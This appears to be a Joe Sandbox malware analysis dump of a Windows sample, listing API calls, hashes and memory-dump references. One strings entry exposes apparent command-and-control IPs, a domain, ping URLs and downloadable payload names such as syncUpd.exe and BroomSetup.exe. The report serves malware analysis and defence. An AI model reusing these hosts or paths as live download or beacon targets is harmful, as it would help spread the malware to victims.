                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                                                                                                              • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                              • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                              • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 043AD5DE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                              • Instruction ID: 818d73bf39ceeb7fb59ff3957337efbc9364278c9f6c717621c13ba81c4d67a6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8113C79A40208EFDB01DF98C985E98BBF5EF08350F098094F9489B362D371EA50DF80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 043465BB: __EH_prolog.LIBCMT ref: 043465C0
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 04344E6C
                                                                                                                                                                                                                                                • Part of subcall function 04346149: __EH_prolog.LIBCMT ref: 0434614E
                                                                                                                                                                                                                                                • Part of subcall function 04346149: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04346230
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                              • String ID: @$/1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$nine$note.padd.cn.com$one$seven$ten$two
                                                                                                                                                                                                                                              • API String ID: 2531350358-486824737
                                                                                                                                                                                                                                              • Opcode ID: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                              • Instruction ID: 7578a457fcc092577ad9695a05404d0bc4233edbce6684784e7b9270123b321e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3A2033140B2F0AEF711B7785AD659E3FE51F63244FA474A9D4A13B363C958A20C839B
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                              • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                              • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                              • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                              • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                              • String ID: 0B$DCA
                                                                                                                                                                                                                                              • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                              • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                              • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP$B
                                                                                                                                                                                                                                              • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                              • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                              • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                              • Opcode ID: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
                                                                                                                                                                                                                                              • Instruction ID: feac748cf68cf789a777818c524f5d4ea303f7336cb9653a69c72d87dadf9180
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74C25B71E046289FDB25CE28ED407EAB7B5EB94304F5441EBD80DE7250E7B8AE818F45
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04340D4D,?,00000000), ref: 04340AC7
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04340D4D,?,00000000), ref: 04340AF0
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,04340D4D,?,00000000), ref: 04340B05
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                              • Instruction ID: 02d5e7b6891a1fc240be978b8c65f461869f1555dd59e9e1ff55542364298acd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A218C22B00104AAD7388F64C900AE772FBEFC4A74B569465EA0AD7180FB32FE41C394
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04340D0E
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 04340D69
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 04340D78
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,043345A4,00000040,?,043346C4,00000055,00000000,?,?,00000055,00000000), ref: 04340DC0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,04334624,00000040), ref: 04340DDF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                                              • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                              • Instruction ID: d9ee1966d01a0edfa02339c1952dc23547ee6929f55aad0a9a207c20fdd7512c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB516F71B01219ABEB24EFA4DC40BFE77F8EF85700F545569EA04EB190EB70B9448B61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,043345AB,?,?,?,?,04334002,?,00000004), ref: 043403AC
                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0434043C
                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0434044A
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,043345AB,00000000,043346CB), ref: 043404ED
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                                              • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                              • Instruction ID: da533636871b1138219cf339cdb1ae27f46563944a9da46d2b01c571d836e7cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4561E972700605ABE728AB74CC41BFA77FCEF84705F146469EA05DB581EA74F9448B90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID: =CA${B
                                                                                                                                                                                                                                              • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                              • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                              • Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                                                                              • Opcode ID: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                              • Instruction ID: 67309229f61afd2ab5856e0fbe736b03e5ebd4e934039cb527c6d869dde023b9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0619F71A00127ABDB28DF25EC82BBB77E8EF44314F50406AED05C6682E778D995CF58
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04330A9A
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04330AA4
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04330AB1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                              • Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                              • Instruction ID: 345e4a3f4c5facec6ad5387ddae28cdc4b999c7e9ec39bebac58bd5815040278
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C831C67490232C9BDB21DF68DD8879DBBB4BF08310F5051EAE41CA7250EB30AB858F44
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                              • Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                              • Instruction ID: 9ac9671248c07c9c342bf92be5d06c8e759fe12cce2f5fd6b0acbfcbce77c00d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3531C3749012189BCB21EF25DD887CDB7B4BF08310F5041EAE41CA7291EB749F858F88
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,04333C24,00000003,00439450,0000000C,04333D7B,00000003,00000002,00000000,?,04332DD2,00000003), ref: 04333C6F
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,04333C24,00000003,00439450,0000000C,04333D7B,00000003,00000002,00000000,?,04332DD2,00000003), ref: 04333C76
